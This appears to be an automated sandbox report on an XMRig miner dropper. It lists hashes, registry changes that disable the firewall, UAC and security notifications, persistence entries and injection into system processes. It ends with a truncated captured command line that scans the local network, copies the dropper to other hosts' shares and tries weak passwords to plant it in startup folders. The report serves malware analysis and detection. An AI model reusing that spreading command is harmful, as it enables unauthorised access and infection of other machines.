xmrig | 2bfe501031c14858507f0cc09a4312ca438b521f16fa83e90f93b067a929aaab

General

Target

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Size

2.3MB
MD5

921379bd587ab29da4dc23fb9d47fe36
SHA1

e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA256

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA512

90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

Score

10^/10

xmrig evasion miner persistence trojan upx

Malware Config

Signatures

Modifies firewall policy service 2 TTPs 6 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	VID001.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe	xmrig
behavioral2/memory/1696-24-0x0000000000400000-0x00000000009E7000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

VID001.exe

pid process

2464 VID001.exe

pid	process
2464	VID001.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4692-2-0x00000000024B0000-0x000000000353E000-memory.dmp	upx
behavioral2/memory/2464-9-0x00000000023E0000-0x000000000346E000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

VID001.exe

pid process

2464 VID001.exe
Drops startup file 1 IoCs

Processes:

VID001.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk VID001.exe
Loads dropped DLL 2 IoCs

Processes:

VID001.exe

pid process

2464 VID001.exe
2464 VID001.exe

pid	process
2464	VID001.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	VID001.exe

pid	process
2464	VID001.exe
2464	VID001.exe

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"	VID001.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc	VID001.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

VID001.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	VID001.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\	VID001.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	VID001.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\	VID001.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

VID001.exe

description	ioc	process
File opened (read-only)	\??\S:	VID001.exe
File opened (read-only)	\??\U:	VID001.exe
File opened (read-only)	\??\V:	VID001.exe
File opened (read-only)	\??\W:	VID001.exe
File opened (read-only)	\??\Z:	VID001.exe
File opened (read-only)	\??\G:	VID001.exe
File opened (read-only)	\??\I:	VID001.exe
File opened (read-only)	\??\J:	VID001.exe
File opened (read-only)	\??\L:	VID001.exe
File opened (read-only)	\??\P:	VID001.exe
File opened (read-only)	\??\Y:	VID001.exe
File opened (read-only)	\??\M:	VID001.exe
File opened (read-only)	\??\N:	VID001.exe
File opened (read-only)	\??\Q:	VID001.exe
File opened (read-only)	\??\R:	VID001.exe
File opened (read-only)	\??\X:	VID001.exe
File opened (read-only)	\??\E:	VID001.exe
File opened (read-only)	\??\F:	VID001.exe
File opened (read-only)	\??\H:	VID001.exe
File opened (read-only)	\??\K:	VID001.exe
File opened (read-only)	\??\O:	VID001.exe
File opened (read-only)	\??\T:	VID001.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091
Drops file in Windows directory 1 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description ioc process

File opened for modification C:\Windows\SYSTEM.INI 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\SYSTEM.INI	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\0F747584_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\0F747584_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	nsis_installer_2

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

4652 net.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3052 taskkill.exe
3800 taskkill.exe
1776 taskkill.exe
4456 taskkill.exe
Runs net.exe

pid	process
4652	net.exe

pid	process
3052	taskkill.exe
3800	taskkill.exe
1776	taskkill.exe
4456	taskkill.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

pid	process
4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe
2464	VID001.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	pid	process
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Token: SeDebugPrivilege	2464	VID001.exe
Token: SeDebugPrivilege	2464	VID001.exe
Token: SeDebugPrivilege	2464	VID001.exe
Token: SeDebugPrivilege	2464	VID001.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exeVID001.exe

description	pid	process	target process
PID 4692 wrote to memory of 700	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	fontdrvhost.exe
PID 4692 wrote to memory of 704	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	fontdrvhost.exe
PID 4692 wrote to memory of 968	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	dwm.exe
PID 4692 wrote to memory of 2336	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	sihost.exe
PID 4692 wrote to memory of 2344	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	svchost.exe
PID 4692 wrote to memory of 2540	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	taskhostw.exe
PID 4692 wrote to memory of 3028	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	Explorer.EXE
PID 4692 wrote to memory of 3248	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	ShellExperienceHost.exe
PID 4692 wrote to memory of 3260	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	SearchUI.exe
PID 4692 wrote to memory of 3488	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	RuntimeBroker.exe
PID 4692 wrote to memory of 3780	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	DllHost.exe
PID 4692 wrote to memory of 2464	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 4692 wrote to memory of 2464	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 4692 wrote to memory of 2464	4692	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe	VID001.exe
PID 2464 wrote to memory of 700	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 704	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 968	2464	VID001.exe	dwm.exe
PID 2464 wrote to memory of 2336	2464	VID001.exe	sihost.exe
PID 2464 wrote to memory of 2344	2464	VID001.exe	svchost.exe
PID 2464 wrote to memory of 2540	2464	VID001.exe	taskhostw.exe
PID 2464 wrote to memory of 3028	2464	VID001.exe	Explorer.EXE
PID 2464 wrote to memory of 3248	2464	VID001.exe	ShellExperienceHost.exe
PID 2464 wrote to memory of 3260	2464	VID001.exe	SearchUI.exe
PID 2464 wrote to memory of 3488	2464	VID001.exe	RuntimeBroker.exe
PID 2464 wrote to memory of 3780	2464	VID001.exe	DllHost.exe
PID 2464 wrote to memory of 3464	2464	VID001.exe	DllHost.exe
PID 2464 wrote to memory of 700	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 704	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 968	2464	VID001.exe	dwm.exe
PID 2464 wrote to memory of 2336	2464	VID001.exe	sihost.exe
PID 2464 wrote to memory of 2344	2464	VID001.exe	svchost.exe
PID 2464 wrote to memory of 2540	2464	VID001.exe	taskhostw.exe
PID 2464 wrote to memory of 3028	2464	VID001.exe	Explorer.EXE
PID 2464 wrote to memory of 3248	2464	VID001.exe	ShellExperienceHost.exe
PID 2464 wrote to memory of 3260	2464	VID001.exe	SearchUI.exe
PID 2464 wrote to memory of 3488	2464	VID001.exe	RuntimeBroker.exe
PID 2464 wrote to memory of 3780	2464	VID001.exe	DllHost.exe
PID 2464 wrote to memory of 828	2464	VID001.exe	backgroundTaskHost.exe
PID 2464 wrote to memory of 1264	2464	VID001.exe	slui.exe
PID 2464 wrote to memory of 700	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 704	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 968	2464	VID001.exe	dwm.exe
PID 2464 wrote to memory of 2336	2464	VID001.exe	sihost.exe
PID 2464 wrote to memory of 2344	2464	VID001.exe	svchost.exe
PID 2464 wrote to memory of 2540	2464	VID001.exe	taskhostw.exe
PID 2464 wrote to memory of 3028	2464	VID001.exe	Explorer.EXE
PID 2464 wrote to memory of 3248	2464	VID001.exe	ShellExperienceHost.exe
PID 2464 wrote to memory of 3260	2464	VID001.exe	SearchUI.exe
PID 2464 wrote to memory of 3488	2464	VID001.exe	RuntimeBroker.exe
PID 2464 wrote to memory of 3780	2464	VID001.exe	DllHost.exe
PID 2464 wrote to memory of 828	2464	VID001.exe	backgroundTaskHost.exe
PID 2464 wrote to memory of 700	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 704	2464	VID001.exe	fontdrvhost.exe
PID 2464 wrote to memory of 968	2464	VID001.exe	dwm.exe
PID 2464 wrote to memory of 2336	2464	VID001.exe	sihost.exe
PID 2464 wrote to memory of 2344	2464	VID001.exe	svchost.exe
PID 2464 wrote to memory of 2540	2464	VID001.exe	taskhostw.exe
PID 2464 wrote to memory of 3028	2464	VID001.exe	Explorer.EXE
PID 2464 wrote to memory of 3248	2464	VID001.exe	ShellExperienceHost.exe
PID 2464 wrote to memory of 3260	2464	VID001.exe	SearchUI.exe
PID 2464 wrote to memory of 3488	2464	VID001.exe	RuntimeBroker.exe
PID 2464 wrote to memory of 3780	2464	VID001.exe	DllHost.exe
PID 2464 wrote to memory of 828	2464	VID001.exe	backgroundTaskHost.exe
PID 2464 wrote to memory of 700	2464	VID001.exe	fontdrvhost.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

VID001.exe50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	VID001.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:700

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:704

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2540

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3248

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3780

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3488

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3260

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3028

C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"
2⤵
- Modifies firewall policy service
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4692

C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"
3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
4⤵
PID:2364

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuCNMiner*
5⤵
- Kills process with taskkill
PID:3052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im IMG0*
5⤵
- Kills process with taskkill
PID:1776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*
4⤵
PID:2508

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im uihost*
5⤵
- Kills process with taskkill
PID:3800

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im DOC0*
5⤵
- Kills process with taskkill
PID:4456

C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
"C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe"
4⤵
PID:1696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" 